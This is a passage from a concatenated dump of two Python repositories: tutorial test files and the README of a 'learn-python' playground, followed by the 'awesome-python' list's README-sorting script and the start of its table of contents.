'third param', fourth_param_name='fourth named param', fifth_param_name='fifth named param', ) File: src/functions/test_function_unpacking_arguments.py """Unpacking Argument Lists @see: https://docs.python.org/3/tutorial/controlflow.html#unpacking-argument-lists Unpacking arguments may be executed via * and ** operators. See below for further details. """ def test_function_unpacking_arguments(): """Unpacking Argument Lists""" # The situation may occur when the arguments are already in a list or tuple but need to be # unpacked for a function call requiring separate positional arguments. For instance, the # built-in range() function expects separate start and stop arguments. If they are not # available separately, write the function call with the *-operator to unpack the arguments out # of a list or tuple: # Normal call with separate arguments: assert list(range(3, 6)) == [3, 4, 5] # Call with arguments unpacked from a list. arguments_list = [3, 6] assert list(range(*arguments_list)) == [3, 4, 5] # In the same fashion, dictionaries can deliver keyword arguments with the **-operator: def function_that_receives_names_arguments(first_word, second_word): return first_word + ', ' + second_word + '!' arguments_dictionary = {'first_word': 'Hello', 'second_word': 'World'} assert function_that_receives_names_arguments(**arguments_dictionary) == 'Hello, World!' File: src/functions/test_function_decorators.py """Function Decorators. @see: https://www.thecodeship.com/patterns/guide-to-python-function-decorators/ Function decorators are simply wrappers to existing functions. In the context of design patterns, decorators dynamically alter the functionality of a function, method or class without having to directly use subclasses. This is ideal when you need to extend the functionality of functions that you don't want to modify. We can implement the decorator pattern anywhere, but Python facilitates the implementation by providing much more expressive features and syntax for that. """ def test_function_decorators(): """Function Decorators.""" # Function decorators are simply wrappers to existing functions. Putting the ideas mentioned # above together, we can build a decorator. In this example let's consider a function that # wraps the string output of another function by p tags. # This is the function that we want to decorate. def greeting(name): return "Hello, {0}!".format(name) # This function decorates another functions output with <p> tag. def decorate_with_p(func): def function_wrapper(name): return "<p>{0}</p>".format(func(name)) return function_wrapper # Now, let's call our decorator and pass the function we want decorate to it. my_get_text = decorate_with_p(greeting) # Here we go, we've just decorated the function output without changing the function itself. assert my_get_text('John') == '<p>Hello, John!</p>' # With decorator. assert greeting('John') == 'Hello, John!' # Without decorator. # Now, Python makes creating and using decorators a bit cleaner and nicer for the programmer # through some syntactic sugar There is a neat shortcut for that, which is to mention the # name of the decorating function before the function to be decorated. The name of the # decorator should be prepended with an @ symbol. @decorate_with_p def greeting_with_p(name): return "Hello, {0}!".format(name) assert greeting_with_p('John') == '<p>Hello, John!</p>' # Now let's consider we wanted to decorate our greeting function by one more functions to wrap a # div the string output. # This will be our second decorator. def decorate_with_div(func): def function_wrapper(text): return "<div>{0}</div>".format(func(text)) return function_wrapper # With the basic approach, decorating get_text would be along the lines of # greeting_with_div_p = decorate_with_div(decorate_with_p(greeting_with_p)) # With Python's decorator syntax, same thing can be achieved with much more expressive power. @decorate_with_div @decorate_with_p def greeting_with_div_p(name): return "Hello, {0}!".format(name) assert greeting_with_div_p('John') == '<div><p>Hello, John!</p></div>' # One important thing to notice here is that the order of setting our decorators matters. # If the order was different in the example above, the output would have been different. # Passing arguments to decorators. # Looking back at the example before, you can notice how redundant the decorators in the # example are. 2 decorators(decorate_with_div, decorate_with_p) each with the same # functionality but wrapping the string with different tags. We can definitely do much better # than that. Why not have a more general implementation for one that takes the tag to wrap # with as a string? Yes please! def tags(tag_name): def tags_decorator(func): def func_wrapper(name): return "<{0}>{1}</{0}>".format(tag_name, func(name)) return func_wrapper return tags_decorator @tags('div') @tags('p') def greeting_with_tags(name): return "Hello, {0}!".format(name) assert greeting_with_tags('John') == '<div><p>Hello, John!</p></div>' File: src/control_flow/test_while.py """WHILE statement @see: https://docs.python.org/3/tutorial/controlflow.html @see: https://docs.python.org/3/reference/compound_stmts.html#the-while-statement The while loop executes as long as the condition remains true. In Python, like in C, any non-zero integer value is true; zero is false. The condition may also be a string or list value, in fact any sequence; anything with a non-zero length is true, empty sequences are false. The test used in the example is a simple comparison. The standard comparison operators are written the same as in C: < (less than), > (greater than), == (equal to), <= (less than or equal to), >= (greater than or equal to) and != (not equal to). """ def test_while_statement(): """WHILE statement""" # Let's raise the number to certain power using while loop. number = 2 power = 5 result = 1 while power > 0: result *= number power -= 1 # 2^5 = 32 assert result == 32 File: src/control_flow/test_try.py """TRY statement @see: https://www.w3schools.com/python/python_try_except.asp "try" statement is used for exception handling. When an error occurs, or exception as we call it, Python will normally stop and generate an error message. These exceptions can be handled using the try statement. The "try" block lets you test a block of code for errors. The "except" block lets you handle the error. The "else" block lets you execute the code if no errors were raised. The "finally" block lets you execute code, regardless of the result of the try- and except blocks. """ def test_try(): """TRY statement""" # The try block will generate an error, because x is not defined: exception_has_been_caught = False try: # pylint: disable=undefined-variable print(not_existing_variable) except NameError: exception_has_been_caught = True assert exception_has_been_caught # You can define as many exception blocks as you want, e.g. if you want to execute a special # block of code for a special kind of error: exception_message = '' try: # pylint: disable=undefined-variable print(not_existing_variable) except NameError: exception_message = 'Variable is not defined' assert exception_message == 'Variable is not defined' # You can use the else keyword to define a block of code to be executed # if no errors were raised. message = '' # pylint: disable=broad-except try: message += 'Success.' except NameError: message += 'Something went wrong.' else: message += 'Nothing went wrong.' assert message == 'Success.Nothing went wrong.' # The finally block, if specified, will be executed regardless if the try block raises an # error or not. message = '' try: # pylint: undefined-variable print(not_existing_variable) # noqa: F821 except NameError: message += 'Something went wrong.' finally: message += 'The "try except" is finished.' assert message == 'Something went wrong.The "try except" is finished.' File: src/control_flow/test_break.py """BREAK statement @see: https://docs.python.org/3/tutorial/controlflow.html The break statement, like in C, breaks out of the innermost enclosing "for" or "while" loop. """ def test_break_statement(): """BREAK statement""" # Let's terminate the loop in case if we've found the number we need in a range from 0 to 100. number_to_be_found = 42 # This variable will record how many time we've entered the "for" loop. number_of_iterations = 0 for number in range(100): if number == number_to_be_found: # Break here and don't continue the loop. break else: number_of_iterations += 1 # We need to make sure that break statement has terminated the loop once it found the number. assert number_of_iterations == 42 File: src/control_flow/test_for.py """FOR statement @see: https://docs.python.org/3/tutorial/controlflow.html The for statement in Python differs a bit from what you may be used to in C or Pascal. Rather than always iterating over an arithmetic progression of numbers (like in Pascal), or giving the user the ability to define both the iteration step and halting condition (as C), Python’s for statement iterates over the items of any sequence (a list or a string), in the order that they appear in the sequence. For example (no pun intended): """ # pylint: disable=too-many-locals def test_for_statement(): """FOR statement""" # Measure some strings: words = ['cat', 'window', 'defenestrate'] words_length = 0 for word in words: words_length += len(word) # "cat" length is 3 # "window" length is 6 # "defenestrate" length is 12 assert words_length == (3 + 6 + 12) # If you need to modify the sequence you are iterating over while inside the loop # (for example to duplicate selected items), it is recommended that you first make a copy. # Iterating over a sequence does not implicitly make a copy. The slice notation makes this # especially convenient: for word in words[:]: # Loop over a slice copy of the entire list. if len(word) > 6: words.insert(0, word) # Otherwise with for w in words:, the example would attempt to create an infinite list, # inserting defenestrate over and over again. assert words == ['defenestrate', 'cat', 'window', 'defenestrate'] # If you do need to iterate over a sequence of numbers, the built-in function range() comes in # handy. It generates arithmetic progressions: iterated_numbers = [] for number in range(5): iterated_numbers.append(number) assert iterated_numbers == [0, 1, 2, 3, 4] # To iterate over the indices of a sequence, you can combine range() and len() as follows: words = ['Mary', 'had', 'a', 'little', 'lamb'] concatenated_string = '' # pylint: disable=consider-using-enumerate for word_index in range(len(words)): concatenated_string += words[word_index] + ' ' assert concatenated_string == 'Mary had a little lamb ' # Or simply use enumerate(). concatenated_string = '' for word_index, word in enumerate(words): concatenated_string += word + ' ' assert concatenated_string == 'Mary had a little lamb ' # When looping through dictionaries, the key and corresponding value can be retrieved at the # same time using the items() method. knights_names = [] knights_properties = [] knights = {'gallahad': 'the pure', 'robin': 'the brave'} for key, value in knights.items(): knights_names.append(key) knights_properties.append(value) assert knights_names == ['gallahad', 'robin'] assert knights_properties == ['the pure', 'the brave'] # When looping through a sequence, the position index and corresponding value can be retrieved # at the same time using the enumerate() function indices = [] values = [] for index, value in enumerate(['tic', 'tac', 'toe']): indices.append(index) values.append(value) assert indices == [0, 1, 2] assert values == ['tic', 'tac', 'toe'] # To loop over two or more sequences at the same time, the entries can be paired with # the zip() function. questions = ['name', 'quest', 'favorite color'] answers = ['lancelot', 'the holy grail', 'blue'] combinations = [] for question, answer in zip(questions, answers): combinations.append('What is your {0}? It is {1}.'.format(question, answer)) assert combinations == [ 'What is your name? It is lancelot.', 'What is your quest? It is the holy grail.', 'What is your favorite color? It is blue.', ] def test_range_function(): """Range function If you do need to iterate over a sequence of numbers, the built-in function range() comes in handy. It generates arithmetic progressions. In many ways the object returned by range() behaves as if it is a list, but in fact it isn’t. It is an object which returns the successive items of the desired sequence when you iterate over it, but it doesn’t really make the list, thus saving space. We say such an object is iterable, that is, suitable as a target for functions and constructs that expect something from which they can obtain successive items until the supply is exhausted. We have seen that the for statement is such an iterator. The function list() is another; it creates lists from iterables: """ assert list(range(5)) == [0, 1, 2, 3, 4] # The given end point is never part of the generated sequence; range(10) generates 10 values, # the legal indices for items of a sequence of length 10. It is possible to let the range start # at another number, or to specify a different increment (even negative; sometimes this is # called the ‘step’): assert list(range(5, 10)) == [5, 6, 7, 8, 9] assert list(range(0, 10, 3)) == [0, 3, 6, 9] assert list(range(-10, -100, -30)) == [-10, -40, -70] File: src/control_flow/test_if.py """IF statement @see: https://docs.python.org/3/tutorial/controlflow.html There can be zero or more elif parts, and the else part is optional. The keyword ‘elif’ is short for ‘else if’, and is useful to avoid excessive indentation. An if … elif … elif … sequence is a substitute for the switch or case statements found in other languages. """ def test_if_statement(): """IF statement""" number = 15 conclusion = '' if number < 0: conclusion = 'Number is less than zero' elif number == 0: conclusion = 'Number equals to zero' elif number < 1: conclusion = 'Number is greater than zero but less than one' else: conclusion = 'Number bigger than or equal to one' assert conclusion == 'Number bigger than or equal to one' File: src/control_flow/test_continue.py """CONTINUE statement @see: https://docs.python.org/3/tutorial/controlflow.html The continue statement is borrowed from C, continues with the next iteration of the loop. """ def test_continue_statement(): """CONTINUE statement in FOR loop""" # Let's # This list will contain only even numbers from the range. even_numbers = [] # This list will contain every other numbers (in this case - ods). rest_of_the_numbers = [] for number in range(0, 10): # Check if remainder after division is zero (which would mean that number is even). if number % 2 == 0: even_numbers.append(number) # Stop current loop iteration and go to the next one immediately. continue rest_of_the_numbers.append(number) assert even_numbers == [0, 2, 4, 6, 8] assert rest_of_the_numbers == [1, 3, 5, 7, 9] File: src/modules/test_packages.py """Packages. @see: https://docs.python.org/3/tutorial/modules.html#packages Packages are a way of structuring Python’s module namespace by using “dotted module names”. For example, the module name A.B designates a submodule named B in a package named A. Just like the use of modules saves the authors of different modules from having to worry about each other’s global variable names, the use of dotted module names saves the authors of multi-module packages like NumPy or Pillow from having to worry about each other’s module names. The __init__.py files are required to make Python treat the directories as containing packages; this is done to prevent directories with a common name, such as string, from unintentionally hiding valid modules that occur later on the module search path. In the simplest case, __init__.py can just be an empty file, but it can also execute initialization code for the package or set the __all__ variable, described later. When the interpreter executes the import statement, it searches for module in a list of directories assembled from the following sources: - The directory from which the input script was run or the current directory if the interpreter is being run interactively - The list of directories contained in the PYTHONPATH environment variable, if it is set. (The format for PYTHONPATH is OS-dependent but should mimic the PATH environment variable.) - An installation-dependent list of directories configured at the time Python is installed The resulting search path is accessible in the Python variable sys.path, which is obtained from a module named sys: >>> import sys >>> sys.path @see: https://realpython.com/python-modules-packages/ """ # Users of the package can import individual modules from the package, for example. import sound_package.effects.echo # An alternative way of importing the submodule is: # pylint: disable=reimported from sound_package.effects import echo # Yet another variation is to import the desired function or variable directly: from sound_package.effects.echo import echo_function # Note that when using from package import item, the item can be either a submodule (or subpackage) # of the package, or some other name defined in the package, like a function, class or variable. # The import statement first tests whether the item is defined in the package; if not, it assumes # it is a module and attempts to load it. If it fails to find it, an ImportError exception is # raised. # Contrarily, when using syntax like import item.subitem.subsubitem, each item except for the last # must be a package; the last item can be a module or a package but can’t be a class or function or # variable defined in the previous item. def test_packages(): """Packages.""" assert sound_package.effects.echo.echo_function() == 'Do echo effect' assert echo.echo_function() == 'Do echo effect' assert echo_function() == 'Do echo effect' File: src/modules/fibonacci_module.py """Fibonacci numbers module. @see: https://docs.python.org/3/tutorial/modules.html A module is a file containing Python definitions and statements. The file name is the module name with the suffix .py appended. Within a module, the module’s name (as a string) is available as the value of the global variable __name__. """ def fibonacci_at_position(position): """Return Fibonacci number at specified position""" current_position = 0 previous_number, current_number = 0, 1 while current_position < position: current_position += 1 previous_number, current_number = current_number, previous_number + current_number return previous_number def fibonacci_smaller_than(limit): """Return Fibonacci series up to limit""" result = [] previous_number, current_number = 0, 1 while previous_number < limit: result.append(previous_number) previous_number, current_number = current_number, previous_number + current_number return result # When you run a Python module with: # # >>> python fibonacci.py <arguments> # # the code in the module will be executed, just as if you imported it, but with # the __name__ set to "__main__". That means that by adding this code at the end of your module # you can make the file usable as a script as well as an importable module, because the code that # parses the command line only runs if the module is executed as the “main” file: # # >>> python fibonacci.py 50 if __name__ == '__main__': import sys print(fibonacci_smaller_than(int(sys.argv[1]))) File: src/modules/test_modules.py """Modules. @see: https://docs.python.org/3/tutorial/modules.html As your program gets longer, you may want to split it into several files for easier maintenance. You may also want to use a handy function that you’ve written in several programs without copying its definition into each program. To support this, Python has a way to put definitions in a file and use them in a script or in an interactive instance of the interpreter. Such a file is called a module; definitions from a module can be imported into other modules or into the main module (the collection of variables that you have access to in a script executed at the top level and in calculator mode). A module is a file containing Python definitions and statements. The file name is the module name with the suffix .py appended. Within a module, the module’s name (as a string) is available as the value of the global variable __name__. When the interpreter executes the import statement, it searches for module in a list of directories assembled from the following sources: - The directory from which the input script was run or the current directory if the interpreter is being run interactively - The list of directories contained in the PYTHONPATH environment variable, if it is set. (The format for PYTHONPATH is OS-dependent but should mimic the PATH environment variable.) - An installation-dependent list of directories configured at the time Python is installed The resulting search path is accessible in the Python variable sys.path, which is obtained from a module named sys: >>> import sys >>> sys.path @see: https://realpython.com/python-modules-packages/ """ # This does not enter the names of the functions defined in fibonacci_module directly in the # current symbol table; it only enters the module name fibonacci_module there. import fibonacci_module # There is a variant of the import statement that imports names from a module directly into the # importing module’s symbol table. For example: # pylint: disable=reimported from fibonacci_module import fibonacci_at_position, fibonacci_smaller_than # There is even a variant to import all names that a module defines. This imports all names except # those beginning with an underscore (_). In most cases Python programmers do not use this facility # since it introduces an unknown set of names into the interpreter, possibly hiding some things you # have already defined. # >>> from fibonacci_module import * # If the module name is followed by as, then the name following as is bound directly to the # imported module: import fibonacci_module as fibonacci_module_renamed # It can also be used when utilising from with similar effects: from fibonacci_module import fibonacci_at_position as fibonacci_at_position_renamed # When a module named spam is imported, the interpreter first searches for a built-in module with # that name. If not found, it then searches for a file named spam.py in a list of directories # given by the variable sys.path. sys.path is initialized from these locations: # # - The directory containing the input script (or the current directory when no file is specified). # - PYTHONPATH (a list of directory names, with the same syntax as the shell variable PATH). # - The installation-dependent default. def test_modules(): """Modules""" assert fibonacci_module.fibonacci_at_position(7) == 13 assert fibonacci_at_position(7) == 13 assert fibonacci_module_renamed.fibonacci_at_position(7) == 13 assert fibonacci_at_position_renamed(7) == 13 assert fibonacci_module.fibonacci_smaller_than(100) == [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89] assert fibonacci_smaller_than(100) == [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89] assert fibonacci_module_renamed.fibonacci_smaller_than(10) == [0, 1, 1, 2, 3, 5, 8] # If you intend to use a function often you can assign it to a local name. fibonacci = fibonacci_module.fibonacci_smaller_than assert fibonacci(100) == [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89] # The built-in function dir() is used to find out which names a module defines. It returns a # sorted list of strings. assert dir(fibonacci_module) == [ '__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', 'fibonacci_at_position', 'fibonacci_smaller_than', ] File: src/modules/sound_package/__init__.py File: src/modules/sound_package/formats/aif.py """AIF file support.""" def aif_read(): """AIF file reading function mock""" return 'Read from AIF file' File: src/modules/sound_package/formats/__init__.py File: src/modules/sound_package/formats/wav.py """WAV file support.""" def wav_read(): """WAV file reading function mock""" return 'Read from WAV file' File: src/modules/sound_package/effects/reverse.py """Reverse effect.""" def reverse_function(): """Reveres function mock""" return 'Do reverse effect' File: src/modules/sound_package/effects/__init__.py File: src/modules/sound_package/effects/echo.py """Echo effect.""" def echo_function(): """Echo function mock""" return 'Do echo effect' File: src/getting_started/test_variables.py """Variables @see: https://docs.python.org/3/tutorial/introduction.html @see: https://www.w3schools.com/python/python_variables.asp @see: https://www.learnpython.org/en/Variables_and_Types Python is completely object oriented, and not "statically typed". You do not need to declare variables before using them, or declare their type. Every variable in Python is an object. Unlike other programming languages, Python has no command for declaring a variable. A variable is created the moment you first assign a value to it. A variable can have a short name (like x and y) or a more descriptive name (age, carname, total_volume). Rules for Python variables: - A variable name must start with a letter or the underscore character. - A variable name cannot start with a number. - A variable name can only contain alpha-numeric characters and underscores (A-z, 0-9, and _ ). - Variable names are case-sensitive (age, Age and AGE are three different variables). """ def test_variables(): """Test variables""" integer_variable = 5 string_variable = 'John' assert integer_variable == 5 assert string_variable == 'John' variable_with_changed_type = 4 # x is of type int variable_with_changed_type = 'Sally' # x is now of type str assert variable_with_changed_type == 'Sally'
# Playground and Cheatsheet for Learning Python > 🇺🇦 UKRAINE [IS BEING ATTACKED](https://war.ukraine.ua/) BY RUSSIAN ARMY. CIVILIANS ARE GETTING KILLED. RESIDENTIAL AREAS ARE GETTING BOMBED. > - Help Ukraine via: > - [Serhiy Prytula Charity Foundation](https://prytulafoundation.org/en/) > - [Come Back Alive Charity Foundation](https://savelife.in.ua/en/donate-en/) > - [National Bank of Ukraine](https://bank.gov.ua/en/news/all/natsionalniy-bank-vidkriv-spetsrahunok-dlya-zboru-koshtiv-na-potrebi-armiyi) > - More info on [war.ukraine.ua](https://war.ukraine.ua/) and [MFA of Ukraine](https://twitter.com/MFA_Ukraine) <hr/> [![Build Status](https://travis-ci.org/trekhleb/learn-python.svg?branch=master)](https://travis-ci.org/trekhleb/learn-python) > This is a collection of Python scripts that are split by [topics](#table-of-contents) and contain code examples with explanations, different use cases and links to further readings. > _Read this in:_ [_Português_](README.pt-BR.md), [_Español_](README.es-ES.md), [_Traditional Chinese_](README.zh-TW.md). It is a **playground** because you may change or add the code to see how it works and [test it out](#testing-the-code) using assertions. It also allows you to [lint the code](#linting-the-code) you've wrote and check if it fits to Python code style guide. Altogether it might make your learning process to be more interactive and it might help you to keep code quality pretty high from very beginning. It is a **cheatsheet** because you may get back to these code examples once you want to recap the syntax of [standard Python statements and constructions](#table-of-contents). Also because the code is full of assertions you'll be able to see expected functions/statements output right away without launching them. > _You might also be interested in 🤖 [Interactive Machine Learning Experiments](https://github.com/trekhleb/machine-learning-experiments)_ ## How to Use This Repository Each Python script in this repository has the following structure: ```python """Lists <--- Name of the topic here # @see: https://www.learnpython.org/en/Lists <-- Link to further readings goes here Here might go more detailed explanation of the current topic (i.e. general info about Lists). """ def test_list_type(): """Explanation of sub-topic goes here. Each file contains test functions that illustrate sub-topics (i.e. lists type, lists methods). """ # Here is an example of how to build a list. <-- Comments here explain the action squares = [1, 4, 9, 16, 25] # Lists can be indexed and sliced. # Indexing returns the item. assert squares[0] == 1 # <-- Assertions here illustrate the result. # Slicing returns a new list. assert squares[-3:] == [9, 16, 25] # <-- Assertions here illustrate the result. ``` So normally you might want to do the following: - [Find the topic](#table-of-contents) you want to learn or recap. - Read comments and/or documentation that is linked in each script's docstring (as in example above). - Look at code examples and assertions to see usage examples and expected output. - Change code or add new assertions to see how things work. - [Run tests](#testing-the-code) and [lint the code](#linting-the-code) to see if it work and is written correctly. ## Table of Contents 1. **Getting Started** - [What is Python](src/getting_started/what_is_python.md) - [Python Syntax](src/getting_started/python_syntax.md) - [Variables](src/getting_started/test_variables.py) 2. **Operators** - [Arithmetic Operators](src/operators/test_arithmetic.py) (`+`, `-`, `*`, `/`, `//`, `%`, `**`) - [Bitwise Operators](src/operators/test_bitwise.py) (`&`, `|`, `^`, `>>`, `<<`, `~`) - [Assignment Operators](src/operators/test_assigment.py) (`=`, `+=`, `-=`, `/=`, `//=` etc.) - [Comparison Operator](src/operators/test_comparison.py) (`==`, `!=`, `>`, `<`, `>=`, `<=`) - [Logical Operators](src/operators/test_logical.py) (`and`, `or`, `not`) - [Identity Operators](src/operators/test_identity.py) (`is`, `is not`) - [Membership Operators](src/operators/test_membership.py) (`in`, `not in`) 3. **Data Types** - [Numbers](src/data_types/test_numbers.py) (including booleans) - [Strings](src/data_types/test_strings.py) and their methods - [Lists](src/data_types/test_lists.py) and their methods (including list comprehensions) - [Tuples](src/data_types/test_tuples.py) - [Sets](src/data_types/test_sets.py) and their methods - [Dictionaries](src/data_types/test_dictionaries.py) - [Type Casting](src/data_types/test_type_casting.py) 4. **Control Flow** - [The `if` statement](src/control_flow/test_if.py) - [The `for` statement](src/control_flow/test_for.py) (and `range()` function) - [The `while` statement](src/control_flow/test_while.py) - [The `try` statements](src/control_flow/test_try.py) - [The `break` statement](src/control_flow/test_break.py) - [The `continue` statement](src/control_flow/test_continue.py) 5. **Functions** - [Function Definition](src/functions/test_function_definition.py) (`def` and `return` statements) - [Scopes of Variables Inside Functions](src/functions/test_function_scopes.py) (`global` and `nonlocal` statements) - [Default Argument Values](src/functions/test_function_default_arguments.py) - [Keyword Arguments](src/functions/test_function_keyword_arguments.py) - [Arbitrary Argument Lists](src/functions/test_function_arbitrary_arguments.py) - [Unpacking Argument Lists](src/functions/test_function_unpacking_arguments.py) (`*` and `**` statements) - [Lambda Expressions](src/functions/test_lambda_expressions.py) (`lambda` statement) - [Documentation Strings](src/functions/test_function_documentation_string.py) - [Function Annotations](src/functions/test_function_annotations.py) - [Function Decorators](src/functions/test_function_decorators.py) 6. **Classes** - [Class Definition](src/classes/test_class_definition.py) (`class` statement) - [Class Objects](src/classes/test_class_objects.py) - [Instance Objects](src/classes/test_instance_objects.py) - [Method Objects](src/classes/test_method_objects.py) - [Class and Instance Variables](src/classes/test_class_and_instance_variables.py) - [Inheritance](src/classes/test_inheritance.py) - [Multiple Inheritance](src/classes/test_multiple_inheritance.py) 7. **Modules** - [Modules](src/modules/test_modules.py) (`import` statement) - [Packages](src/modules/test_packages.py) 8. **Errors and Exceptions** - [Handling Exceptions](src/exceptions/test_handle_exceptions.py) (`try` statement) - [Raising Exceptions](src/exceptions/test_raise_exceptions.py) (`raise` statement) 9. **Files** - [Reading and Writing](src/files/test_file_reading.py) (`with` statement) - [Methods of File Objects](src/files/test_file_methods.py) 10. **Additions** - [The `pass` statement](src/additions/test_pass.py) - [Generators](src/additions/test_generators.py) (`yield` statement) 11. **Brief Tour of the Standard Libraries** - [Serialization](src/standard_libraries/test_json.py) (`json` library) - [File Wildcards](src/standard_libraries/test_glob.py) (`glob` library) - [String Pattern Matching](src/standard_libraries/test_re.py) (`re` library) - [Mathematics](src/standard_libraries/test_math.py) (`math`, `random`, `statistics` libraries) - [Dates and Times](src/standard_libraries/test_datetime.py) (`datetime` library) - [Data Compression](src/standard_libraries/test_zlib.py) (`zlib` library) 12. **User input** - [Terminal input](src/user_input/test_input.py) (`input` statement) ## Prerequisites **Installing Python** Make sure that you have [Python3 installed](https://realpython.com/installing-python/) on your machine. You might want to use [venv](https://docs.python.org/3/library/venv.html) standard Python library to create virtual environments and have Python, pip and all dependent packages to be installed and served from the local project directory to avoid messing with system wide packages and their versions. Depending on your installation you might have access to Python3 interpreter either by running `python` or `python3`. The same goes for pip package manager - it may be accessible either by running `pip` or `pip3`. You may check your Python version by running: ```bash python --version ``` Note that in this repository whenever you see `python` it will be assumed that it is Python **3**. **Installing dependencies** Install all dependencies that are required for the project by running: ```bash pip install -r requirements.txt ``` ## Testing the Code Tests are made using [pytest](https://docs.pytest.org/en/latest/) framework. You may add new tests for yourself by adding files and functions with `test_` prefix (i.e. `test_topic.py` with `def test_sub_topic()` function inside). To run all the tests please execute the following command from the project root folder: ```bash pytest ``` To run specific tests please execute: ```bash pytest ./path/to/the/test_file.py ``` ## Linting the Code Linting is done using [pylint](http://pylint.pycqa.org/) and [flake8](http://flake8.pycqa.org/en/latest/) libraries. ### PyLint To check if the code is written with respect to [PEP 8](https://www.python.org/dev/peps/pep-0008/) style guide please run: ```bash pylint ./src/ ``` In case if linter will detect error (i.e. `missing-docstring`) you may want to read more about specific error by running: ```bash pylint --help-msg=missing-docstring ``` [More about PyLint](http://pylint.pycqa.org/) ### Flake8 To check if the code is written with respect to [PEP 8](https://www.python.org/dev/peps/pep-0008/) style guide please run: ```bash flake8 ./src ``` Or if you want to have more detailed output you may run: ```bash flake8 ./src --statistics --show-source --count ``` [More about Flake8](http://flake8.pycqa.org/en/latest/) ## Author - [@trekhleb](https://trekhleb.dev)
awesome-python
2252650cfdff3782d5a85458507fe9ec6edde7a4
File: sort.py #!/usr/bin/env python # coding: utf-8 """ The approach taken is explained below. I decided to do it simply. Initially I was considering parsing the data into some sort of structure and then generating an appropriate README. I am still considering doing it - but for now this should work. The only issue I see is that it only sorts the entries at the lowest level, and that the order of the top-level contents do not match the order of the actual entries. This could be extended by having nested blocks, sorting them recursively and flattening the end structure into a list of lines. Revision 2 maybe ^.^. """ def sort_blocks(): # First, we load the current README into memory with open('README.md', 'r') as read_me_file: read_me = read_me_file.read() # Separating the 'table of contents' from the contents (blocks) table_of_contents = ''.join(read_me.split('- - -')[0]) blocks = ''.join(read_me.split('- - -')[1]).split('\n# ') for i in range(len(blocks)): if i == 0: blocks[i] = blocks[i] + '\n' else: blocks[i] = '# ' + blocks[i] + '\n' # Sorting the libraries inner_blocks = sorted(blocks[0].split('##')) for i in range(1, len(inner_blocks)): if inner_blocks[i][0] != '#': inner_blocks[i] = '##' + inner_blocks[i] inner_blocks = ''.join(inner_blocks) # Replacing the non-sorted libraries by the sorted ones and gathering all at the final_README file blocks[0] = inner_blocks final_README = table_of_contents + '- - -' + ''.join(blocks) with open('README.md', 'w+') as sorted_file: sorted_file.write(final_README) def main(): # First, we load the current README into memory as an array of lines with open('README.md', 'r') as read_me_file: read_me = read_me_file.readlines() # Then we cluster the lines together as blocks # Each block represents a collection of lines that should be sorted # This was done by assuming only links ([...](...)) are meant to be sorted # Clustering is done by indentation blocks = [] last_indent = None for line in read_me: s_line = line.lstrip() indent = len(line) - len(s_line) if any([s_line.startswith(s) for s in ['* [', '- [']]): if indent == last_indent: blocks[-1].append(line) else: blocks.append([line]) last_indent = indent else: blocks.append([line]) last_indent = None with open('README.md', 'w+') as sorted_file: # Then all of the blocks are sorted individually blocks = [ ''.join(sorted(block, key=str.lower)) for block in blocks ] # And the result is written back to README.md sorted_file.write(''.join(blocks)) # Then we call the sorting method sort_blocks() if __name__ == "__main__": main()
# Awesome Python [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) An opinionated list of awesome Python frameworks, libraries, software and resources. Inspired by [awesome-php](https://github.com/ziadoz/awesome-php). - [Awesome Python](#awesome-python) - [Admin Panels](#admin-panels) - [Algorithms and Design Patterns](#algorithms-and-design-patterns) - [ASGI Servers](#asgi-servers) - [Asynchronous Programming](#asynchronous-programming) - [Audio](#audio) - [Authentication](#authentication) - [Build Tools](#build-tools) - [Built-in Classes Enhancement](#built-in-classes-enhancement) - [Caching](#caching) - [ChatOps Tools](#chatops-tools) - [CMS](#cms) - [Code Analysis](#code-analysis) - [Command-line Interface Development](#command-line-interface-development) - [Command-line Tools](#command-line-tools) - [Computer Vision](#computer-vision) - [Configuration Files](#configuration-files) - [Cryptography](#cryptography) - [Data Analysis](#data-analysis) - [Data Validation](#data-validation) - [Data Visualization](#data-visualization) - [Database Drivers](#database-drivers) - [Database](#database) - [Date and Time](#date-and-time) - [Debugging Tools](#debugging-tools) - [Deep Learning](#deep-learning) - [DevOps Tools](#devops-tools) - [Distributed Computing](#distributed-computing) - [Distribution](#distribution) - [Documentation](#documentation) - [Downloader](#downloader) - [Editor Plugins and IDEs](#editor-plugins-and-ides) - [Email](#email) - [Environment Management](#environment-management) - [File Manipulation](#file-manipulation) - [Functional Programming](#functional-programming) - [Game Development](#game-development) - [Geolocation](#geolocation) - [GUI Development](#gui-development) - [Hardware](#hardware) - [HTML Manipulation](#html-manipulation) - [HTTP Clients](#http-clients) - [Image Processing](#image-processing) - [Implementations](#implementations) - [Interactive Interpreter](#interactive-interpreter) - [Internationalization](#internationalization) - [Job Scheduler](#job-scheduler) - [Logging](#logging) - [Machine Learning](#machine-learning) - [Miscellaneous](#miscellaneous) - [Natural Language Processing](#natural-language-processing) - [Network Virtualization](#network-virtualization) - [News Feed](#news-feed) - [ORM](#orm) - [Package Management](#package-management) - [Package Repositories](#package-repositories) - [Penetration testing](#penetration-testing) - [Permissions](#permissions) - [Processes](#processes) - [Recommender Systems](#recommender-systems) - [Refactoring](#refactoring) - [RESTful API](#restful-api) - [Robotics](#robotics) - [RPC Servers](#rpc-servers) - [Science](#science) - [Search](#search) - [Serialization](#serialization) - [Serverless Frameworks](#serverless-frameworks) - [Shell](#shell) - [Specific Formats Processing](#specific-formats-processing) - [Static Site Generator](#static-site-generator) - [Tagging](#tagging) - [Task Queues](#task-queues) - [Template Engine](#template-engine) - [Testing](#testing) - [Text Processing](#text-processing) - [Third-party APIs](#third-party-apis) - [URL Manipulation](#url-manipulation) - [Video](#video) - [Web Asset Management](#web-asset-management) - [Web Content Extracting](#web-content-extracting) - [Web Crawling](#web-crawling) - [Web Frameworks](#web-frameworks) - [WebSocket](#websocket) - [WSGI Servers](#wsgi-servers) - [Resources](#resources) - [Newsletters](#newsletters) - [Podcasts](#podcasts) - [Contributing](#contributing) --- ## Admin Panels *Libraries for administrative interfaces.* * [ajenti](https://github.com/ajenti/ajenti) - The admin panel your servers deserve. * [django-grappelli](https://github.com/sehmaschine/django-grappelli) - A jazzy 